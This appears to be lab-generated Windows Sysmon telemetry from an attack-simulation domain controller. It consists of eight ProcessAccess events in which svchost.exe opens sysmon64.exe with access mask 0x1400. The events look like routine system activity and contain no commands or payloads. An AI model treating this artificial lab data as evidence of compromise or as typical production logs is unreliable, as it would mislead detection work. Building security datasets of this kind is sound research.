{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
